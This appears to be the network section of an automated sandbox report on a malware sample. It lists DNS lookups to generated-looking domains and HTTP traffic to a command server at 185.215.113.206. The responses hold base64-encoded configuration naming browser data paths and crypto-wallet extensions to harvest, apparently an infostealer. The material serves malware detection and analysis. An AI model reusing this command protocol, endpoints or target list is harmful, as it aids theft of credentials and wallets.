                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.537878990 CET192.168.2.41.1.1.10x806eStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.566312075 CET192.168.2.41.1.1.10xcaacStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.589653969 CET192.168.2.41.1.1.10x9f81Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.630836010 CET192.168.2.41.1.1.10xd4d2Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.699465036 CET192.168.2.41.1.1.10xa142Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.730746984 CET192.168.2.41.1.1.10x7a7bStandard query (0)founpiuer.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.756480932 CET192.168.2.41.1.1.10x193Standard query (0)navygenerayk.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.783339024 CET192.168.2.41.1.1.10x9613Standard query (0)scriptyprefej.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:25.033680916 CET192.168.2.41.1.1.10x83baStandard query (0)marshal-zhukov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.716645002 CET192.168.2.41.1.1.10xbcbfStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.747594118 CET192.168.2.41.1.1.10xcc27Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.772371054 CET192.168.2.41.1.1.10x4ef4Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.797590971 CET192.168.2.41.1.1.10xe58Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.851687908 CET192.168.2.41.1.1.10x47d6Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.876899958 CET192.168.2.41.1.1.10xf66Standard query (0)founpiuer.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.900979042 CET192.168.2.41.1.1.10xf705Standard query (0)navygenerayk.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.925014019 CET192.168.2.41.1.1.10x1b41Standard query (0)scriptyprefej.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.951076031 CET192.168.2.41.1.1.10xa5a3Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.562684059 CET1.1.1.1192.168.2.40x568eNo error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:06.562808990 CET1.1.1.1192.168.2.40x57f1No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:08.926923990 CET1.1.1.1192.168.2.40xe0abNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:08.926923990 CET1.1.1.1192.168.2.40xe0abNo error (0)plus.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:08.927906036 CET1.1.1.1192.168.2.40xa3dfNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:09.924210072 CET1.1.1.1192.168.2.40xa225No error (0)play.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.497427940 CET1.1.1.1192.168.2.40x663aName error (3)terracedjz.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.529649973 CET1.1.1.1192.168.2.40x6826Name error (3)repostebhu.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.556318045 CET1.1.1.1192.168.2.40x3662Name error (3)thinkyyokej.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.584832907 CET1.1.1.1192.168.2.40xf7e5Name error (3)ducksringjk.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.624264002 CET1.1.1.1192.168.2.40xba8aName error (3)explainvees.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.654925108 CET1.1.1.1192.168.2.40xccb6Name error (3)brownieyuz.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.679982901 CET1.1.1.1192.168.2.40xc221Name error (3)rottieud.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.731704950 CET1.1.1.1192.168.2.40xe5efName error (3)relalingj.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.813119888 CET1.1.1.1192.168.2.40x537Name error (3)tamedgeesy.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:20.840116978 CET1.1.1.1192.168.2.40x6027No error (0)steamcommunity.com23.192.247.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.561096907 CET1.1.1.1192.168.2.40x806eName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.588444948 CET1.1.1.1192.168.2.40xcaacName error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.629060030 CET1.1.1.1192.168.2.40x9f81Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.653369904 CET1.1.1.1192.168.2.40xd4d2Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.721741915 CET1.1.1.1192.168.2.40xa142Name error (3)necklacedmny.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.753498077 CET1.1.1.1192.168.2.40x7a7bName error (3)founpiuer.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.779027939 CET1.1.1.1192.168.2.40x193Name error (3)navygenerayk.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:23.806381941 CET1.1.1.1192.168.2.40x9613Name error (3)scriptyprefej.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:25.041102886 CET1.1.1.1192.168.2.40x83baNo error (0)marshal-zhukov.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:25.041102886 CET1.1.1.1192.168.2.40x83baNo error (0)marshal-zhukov.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.739053965 CET1.1.1.1192.168.2.40xbcbfName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.770307064 CET1.1.1.1192.168.2.40xcc27Name error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.795049906 CET1.1.1.1192.168.2.40x4ef4Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.823002100 CET1.1.1.1192.168.2.40xe58Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.874037981 CET1.1.1.1192.168.2.40x47d6Name error (3)necklacedmny.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.899450064 CET1.1.1.1192.168.2.40xf66Name error (3)founpiuer.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.923465967 CET1.1.1.1192.168.2.40xf705Name error (3)navygenerayk.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.948143959 CET1.1.1.1192.168.2.40x1b41Name error (3)scriptyprefej.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:42.958137989 CET1.1.1.1192.168.2.40xa5a3No error (0)steamcommunity.com23.192.247.89A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        0192.168.2.449730185.215.113.206807352C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.007628918 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.646925926 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:01 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.650057077 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBF
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 211
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="hwid"F72ADCB3FF603810289448------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="build"mars------EGCGHCBKFCFBFHIDHDBF--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.870919943 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:01 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 180
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 4d 44 51 78 59 32 55 7a 4d 44 4d 34 4f 54 41 32 59 54 5a 6a 4e 57 55 35 59 7a 4d 30 5a 44 63 35 5a 44 45 79 5a 47 55 79 4e 47 4e 6d 5a 44 4a 6a 5a 54 56 6a 4d 47 4e 69 59 6d 56 6a 4e 47 4d 79 59 32 55 78 5a 47 4d 32 59 57 4e 69 59 7a 4a 6d 4e 47 52 6b 4e 54 45 33 5a 6a 52 6a 4e 44 6b 31 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                                                        Data Ascii: MDQxY2UzMDM4OTA2YTZjNWU5YzM0ZDc5ZDEyZGUyNGNmZDJjZTVjMGNiYmVjNGMyY2UxZGM2YWNiYzJmNGRkNTE3ZjRjNDk1fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:01.872486115 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAE
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 268
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="message"browsers------JJEGIJEGDBFHDGCAFCAE--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.074568033 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:01 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 2028
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.074657917 CET212INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                                                        Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIg
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.074671030 CET808INData Raw: 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32
                                                                                                                                                                                                                                                                                        Data Ascii: RGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNaWNyb3NvZnRcRWRnZVxBcHBsaWNhdGlvblx8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8MHxRUUJ
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.076141119 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 267
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="message"plugins------HCAFIJDGHCBFHJKFCGIE--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278687954 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:02 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 7116
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278729916 CET112INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                                                        Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtp
